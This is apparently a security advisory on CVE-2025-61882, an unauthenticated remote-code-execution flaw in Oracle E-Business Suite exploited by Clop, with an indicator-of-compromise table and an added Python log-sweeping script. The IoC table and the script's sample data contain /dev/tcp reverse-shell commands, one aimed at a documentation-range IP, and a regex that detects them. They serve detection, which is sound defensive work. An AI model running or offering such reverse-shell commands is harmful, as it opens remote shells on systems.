Summary: Security advisory on Clop ransomware extortion emails targeting customers of Oracle E-Business Suite (EBS). The zero-day vulnerability affects the Concurrent Processing component of Oracle EBS, specifically its BI Publisher Integration, and is remotely exploitable without authentication, allowing attackers to execute arbitrary code via HTTP.
| OEM | Oracle |
| Severity | Critical |
| CVSS Score | 9.8 |
| CVEs | CVE-2025-61882 |
| POC Available | Yes |
| Actively Exploited | Yes |
| Advisory Version | 1.0 |
Overview
Oracle released an emergency patch after the Clop ransomware group actively exploited this flaw in real-world data theft campaigns against vulnerable versions in use by organizations.
All EBS versions from 12.2.3 to 12.2.14 are affected, and immediate patching is required to mitigate the vulnerability.
| Vulnerability Name | CVE ID | Product Affected | Severity | Affected Version |
|---|---|---|---|---|
| RCE vulnerability in Oracle E-Business Suite | CVE-2025-61882 | Oracle E-Business Suite | Critical | 12.2.3 through 12.2.14 |
Technical Summary
The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been used by the Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.
Oracle's fix includes the patch for this flaw and also mitigates additional exploitation paths identified during Oracle's internal investigation.
| CVE ID | Component Affected | Vulnerability Details | Impact |
|---|---|---|---|
| CVE-2025-61882 | BI Publisher Integration | A critical unauthenticated RCE in Oracle E-Business Suite affecting the Concurrent Processing/BI Publisher integration. | Full system compromise, data theft. |
Recommendations
Users and administrators should immediately apply the security patch for CVE-2025-61882 on all affected Oracle E-Business Suite systems.
Prerequisite: ensure the October 2023 Critical Patch Update (CPU) is already installed.
Here are some recommendations below
IOCs
| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establishes an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Source: Oracle
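The following is an added example, not part of the Oracle advisory, showing how a defender can sweep web server access logs, process command lines and file hashes for the published IoCs above. The log lines, command lines, file paths and the 203.0.113.x address are constructed sample data.

```python
import re
from typing import Iterable

# IoCs copied from the advisory table above (IPs defanged with [.] as published).
IOC_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# Reverse-shell idiom from the IoC table: "/bin/bash -i >& /dev/tcp/<host>/<port> 0>&1"
REVSHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/\S*\s*0>&1")


def refang(ip: str) -> str:
    """Turn a defanged indicator like 200[.]107[.]207[.]26 into a matchable IP."""
    return ip.replace("[.]", ".")


IOC_IPS = {refang(ip) for ip in IOC_IPS_DEFANGED}


def scan_access_log(lines: Iterable[str]) -> list[str]:
    """Return lines whose client IP (first field, combined log format) is an IoC IP."""
    return [line for line in lines if line.split(" ", 1)[0] in IOC_IPS]


def scan_process_cmdlines(cmdlines: Iterable[str]) -> list[str]:
    """Return command lines matching the /dev/tcp reverse-shell pattern."""
    return [c for c in cmdlines if REVSHELL_RE.search(c)]


def scan_hashes(file_hashes: dict[str, str]) -> list[str]:
    """Return paths whose SHA-256 (hex) matches a published exploit-kit hash."""
    return [p for p, d in file_hashes.items() if d.lower() in IOC_SHA256]


# Constructed sample telemetry (not from the advisory); 203.0.113.0/24 is a documentation range.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [06/Oct/2025:10:00:01 +0000] "GET /app/login HTTP/1.1" 200 512',
    '200.107.207.26 - - [06/Oct/2025:10:02:13 +0000] "POST /app/upload HTTP/1.1" 200 0',
    '185.181.60.11 - - [06/Oct/2025:10:02:15 +0000] "GET /app/report HTTP/1.1" 200 1024',
]
SAMPLE_CMDLINES = ["bash -c ls -la /tmp", "sh -c /bin/bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"]
SAMPLE_HASHES = {
    "/tmp/exp.py": "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "/tmp/notes.txt": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}


def run_scan() -> dict:
    """Run all three sweeps over the sample data and return the hits per category."""
    return {"ips": scan_access_log(SAMPLE_ACCESS_LOG),
            "revshell": scan_process_cmdlines(SAMPLE_CMDLINES),
            "hashes": scan_hashes(SAMPLE_HASHES)}
```

In a real sweep, feed the functions your OHS/Apache access logs, process auditing output and a SHA-256 inventory of the EBS application tier instead of the sample data.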
Conclusion:
This vulnerability remains under ongoing exploitation by the ransomware group, particularly against unpatched Oracle EBS deployments.
Because it is being actively exploited in the wild, organizations should upgrade to the supported patched version, review logs, investigate for signs of compromise using Oracle's IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption.
References: